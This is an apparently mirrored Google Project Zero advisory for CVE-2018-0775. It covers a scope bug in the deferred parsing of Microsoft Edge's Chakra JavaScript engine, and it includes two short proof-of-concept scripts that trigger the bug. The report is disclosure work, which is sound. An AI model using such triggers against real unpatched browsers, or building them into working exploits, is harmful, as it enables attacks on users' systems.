Microsoft Edge Chakra Deferred Parsing

2018-01-18T00:00:00
ID PACKETSTORM:145952
Type packetstorm
Reporter Google Security Research
Modified 2018-01-18T00:00:00

Description

                                        
                                            `Microsoft Edge: Chakra: Deferred parsing makes wrong scopes #2  
  
CVE-2018-0775  
  
  
Since the PoC is only triggerable when the "DeferParse" flag enabled and requires a with statement, I think this is simillar to <a href="/p/project-zero/issues/detail?id=1310" title="Microsoft Edge: Chakra: Deferred parsing makes wrong scopes" class="closed_ref" rel="nofollow"> issue 1310 </a>.  
  
PoC:  
// Enable the flag using '\n'.repeat(0x1000)  
eval(`(function f() {  
with ({}) {  
(function () {  
print(f);  
})();  
}  
}());` + '\n'.repeat(0x1000));  
  
PoC 2:  
// ./ch poc.js -ForceDeferParse  
(function f() {  
with ({}) {  
(function () {  
print(f);  
})();  
}  
}());  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`